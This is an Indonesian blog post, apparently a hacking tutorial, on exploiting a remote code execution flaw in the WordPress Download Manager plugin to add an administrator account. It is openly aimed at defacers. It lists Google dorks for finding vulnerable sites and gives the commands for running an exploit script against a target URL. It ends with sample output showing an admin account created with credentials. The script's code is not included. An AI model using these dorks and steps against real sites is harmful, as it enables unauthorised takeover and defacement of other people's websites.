Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)

Naufal Ardhani - Halo gaes dah lama ga update artikel nihh kali ini saya bakal bagiin Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin), Cocok banget buat Defacer yang suka deface CMS Wordpress Exploit ini cukup mudah tapi cari targetnya yang males karna saya gasuka dorking -_- jadi ditutorial ini gapake livetarget dulu.

Sebelumnya bagi anda yang belum tau apa itu Remote Code Execution simak sedikit penjelasan dibawah,

Remote Code Execution (RCE) adalah bug yg memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi.  ( Sumber : FACEBOOK )

Bahan :

• Python ( Untuk Pengguna Windows yang belum terinstall python di cmd silahkan download dan install dulu )
• Script Exploiter ( Ekstensi : Python )

 Dork :

• index of "download-manager"
• index of "download-manager" inurl:/wp
• index of "download-manager" inurl:/wordpress/

Step :

1. Buka Terminal anda
2. Open ke Directory dimana anda menyimpan Exploiternya ( kalau saya di Documents/doc/tools ) jadi commandnya : cd Documents/doc/tools/
   
3. Sudah ketemu exploiter.py nya lalu jalankan dengan command : python exploiter.py
   
4.  Jika sudah mendapatkan taget langsung saja eksekusi dengan command : python exploiter.py -t http://www.site-target.com

SEKEDAR GAMBARAN JIKA BERHASIL

[!] Account Added
[!] Location: http://10.0.0.67/wordpress/wp-login.php
[!] Username: r7Uo4v
[!] Password: YN1G1F

Sekian Artikel Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)